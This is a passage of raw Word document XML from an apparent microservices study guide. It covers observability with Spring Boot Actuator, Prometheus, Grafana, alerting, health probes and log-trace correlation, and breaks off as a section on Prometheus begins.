          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New Relic</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to expose application metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F43174"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In Spring Boot, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to expose useful metrics such as request count, error count, JVM stats, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141A0EFA"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Example with Prometheus and Spring Boot Actuator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BD4C82"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management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672D0033"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endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446D90B9"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web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A55EE23"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exposure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D81E5"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include: "health,info,metrics"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8CE51D"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Key Metrics to Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E68D8"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Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Track response times for requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B49021C"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Error Rates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor 5xx and 4xx HTTP error codes to detect issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE2A545"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Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Monitor the number of requests per second.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB0B47"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JVM Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Memory usage, garbage collection times, thread counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1C7A02"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Service Availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure the health of your services (using endpoints like /actuator/health).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E81890E"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Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7387F9"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Set up alerting for critical events like high error rates, high latency, or service downtime. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus Alertmanager</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PagerDuty</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can send alerts via email, SMS, or Slack when thresholds are crossed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D342389"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Automated Health Checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344434EF"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Use health check endpoints like /actuator/health in Spring Boot to monitor the system’s health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF7976"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Configure probes in Kubernetes for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>liveness</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readiness</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D36607"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Service Dependency Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE034C"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Monitor how each service interacts with other services in the architecture. This helps identify bottlenecks and failure points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD12B89"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Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hystrix</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resilience4J</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) can be used to track failures and retries between services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80180F" w14:textId="77777777" w:rsidR="00D056EB"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1899598">
          <v:rect id="_x0000_i2837" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7027E9DD"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Integrating All Three Pillars for Full Observability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4643AB36"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To get a complete picture of your application, it’s important to integrate </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here’s how you can achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C0E0F"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End-to-End Request Flow</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42842E50"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When a request comes in, generate a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>correlation ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or use a trace ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F19D3C"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Log details about the request in a structured format with the correlation ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729EF66"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Propagate the trace ID across microservices (via HTTP headers) so that each service logs the request with the same ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED1E569"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Monitor key metrics related to that request and track its performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455AC051"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Centralized Dashboard</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4590AEBB"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Use a dashboard like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kibana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for ELK stack), </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for Prometheus), or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Datadog</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to display logs, traces, and metrics in one place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8C0476"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This helps to correlate logs with traces and metrics to identify root causes quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48941C7A"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Linking Logs with Traces</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75154697"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When inspecting a trace, ensure that the logs related to that trace can be easily accessed (e.g., logs from the same correlation ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C41F9A1"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Similarly, when viewing logs, link them to the trace context for end-to-end visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A126930" w14:textId="77777777" w:rsidR="00D056EB"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63CAD74">
          <v:rect id="_x0000_i2838" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5A05CB"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9D0ECB"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Observability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is essential for managing complex, distributed systems, especially microservices-based architectures. By effectively using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you gain insight into your system’s health and performance, making it easier to troubleshoot issues and maintain reliable services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D579D"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Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> gives you deep visibility into system behavior and is essential for troubleshooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29270205"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Tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows you to track a request across multiple services, providing insights into latency and performance bottlenecks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58854771"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Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps you keep track of key metrics, ensuring that you can quickly detect and respond to issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C129AC9"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By adhering to best practices in observability, you ensure your application is maintainable, scalable, and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507D804F" w14:textId="098DE67B" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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86DDB96">
          <v:rect id="_x0000_i2839" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E6087F" w14:textId="6D08083D" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="003A1EAD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="684" w:name="_Toc196308164"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Role of Prometheus and Grafana in microservices monitoring</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="684"/>
    </w:p>
    <w:p w14:paraId="695AB62C" w14:textId="09A91348" w:rsidR="00D056EB" w:rsidRPr="00FA65E9" w:rsidRDefault="00D056EB" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Prometheus and Grafana are two popular tools used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monitoring and observability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in microservices architectures. They play complementary roles in collecting, storing, and visualizing metrics to track the performance, health, and reliability of microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580BB5A9" w14:textId="77777777" w:rsidR="00D056EB"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D6128F0">
          <v:rect id="_x0000_i2840" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54450204"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1. Prometheus</w:t>
      </w:r>
    </w:p>
